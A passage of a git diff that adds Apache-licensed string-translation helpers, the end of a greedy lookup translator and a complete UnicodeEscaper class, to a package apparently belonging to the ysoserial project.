sz; + } + if (sz > currentLongest) { + currentLongest = sz; + } + } + this.shortest = currentShortest; + this.longest = currentLongest; + } + + /** + * {@inheritDoc} + */ + @Override + public int translate(final CharSequence input, final int index, final Writer out) throws IOException { + // check if translation exists for the input at position index + if (prefixSet.contains(input.charAt(index))) { + int max = longest; + if (index + longest > input.length()) { + max = input.length() - index; + } + // implement greedy algorithm by trying maximum match first + for (int i = max; i >= shortest; i--) { + final CharSequence subSeq = input.subSequence(index, index + i); + final String result = lookupMap.get(subSeq.toString()); + + if (result != null) { + out.write(result); + return i; + } + } + } + return 0; + } +} \ No newline at end of file diff --git a/src/main/java/ysoserial/translate/UnicodeEscaper.java b/src/main/java/ysoserial/translate/UnicodeEscaper.java new file mode 100644 index 00000000..b5f31a4e --- /dev/null +++ b/src/main/java/ysoserial/translate/UnicodeEscaper.java @@ -0,0 +1,140 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +import java.io.IOException; +import java.io.Writer; + +/** + * Translates codepoints to their Unicode escaped value. + * + * @since 1.0 + */ +public class UnicodeEscaper extends CodePointTranslator { + + /** int value representing the lowest codepoint boundary. */ + private final int below; + /** int value representing the highest codepoint boundary. */ + private final int above; + /** whether to escape between the boundaries or outside them. */ + private final boolean between; + + /** + *

Constructs a UnicodeEscaper for all characters. + *

+ */ + public UnicodeEscaper() { + this(0, Integer.MAX_VALUE, true); + } + + /** + *

Constructs a UnicodeEscaper for the specified range. This is + * the underlying method for the other constructors/builders. The below + * and above boundaries are inclusive when between is + * true and exclusive when it is false.

+ * + * @param below int value representing the lowest codepoint boundary + * @param above int value representing the highest codepoint boundary + * @param between whether to escape between the boundaries or outside them + */ + protected UnicodeEscaper(final int below, final int above, final boolean between) { + this.below = below; + this.above = above; + this.between = between; + } + + /** + *

Constructs a UnicodeEscaper below the specified value (exclusive).

+ * + * @param codepoint below which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static UnicodeEscaper below(final int codepoint) { + return outsideOf(codepoint, Integer.MAX_VALUE); + } + + /** + *

Constructs a UnicodeEscaper above the specified value (exclusive).

+ * + * @param codepoint above which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static UnicodeEscaper above(final int codepoint) { + return outsideOf(0, codepoint); + } + + /** + *

Constructs a UnicodeEscaper outside of the specified values (exclusive).

+ * + * @param codepointLow below which to escape + * @param codepointHigh above which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static UnicodeEscaper outsideOf(final int codepointLow, final int codepointHigh) { + return new UnicodeEscaper(codepointLow, codepointHigh, false); + } + + /** + *

Constructs a UnicodeEscaper between the specified values (inclusive).

+ * + * @param codepointLow above which to escape + * @param codepointHigh below which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static UnicodeEscaper between(final int codepointLow, final int codepointHigh) { + return new UnicodeEscaper(codepointLow, codepointHigh, true); + } + + /** + * {@inheritDoc} + */ + @Override + public boolean translate(final int codepoint, final Writer out) throws IOException { + if (between) { + if (codepoint < below || codepoint > above) { + return false; + } + } else { + if (codepoint >= below && codepoint <= above) { + return false; + } + } + + if (codepoint > 0xffff) { + out.write(toUtf16Escape(codepoint)); + } else { + out.write("\\u"); + out.write(HEX_DIGITS[(codepoint >> 12) & 15]); + out.write(HEX_DIGITS[(codepoint >> 8) & 15]); + out.write(HEX_DIGITS[(codepoint >> 4) & 15]); + out.write(HEX_DIGITS[(codepoint) & 15]); + } + return true; + } + + /** + * Converts the given codepoint to a hex string of the form {@code "\\uXXXX"}. + * + * @param codepoint + * a Unicode code point + * @return the hex string for the given codepoint + * + */ + protected String toUtf16Escape(final int codepoint) { + return "\\u" + hex(codepoint); + } +} \ No newline at end of file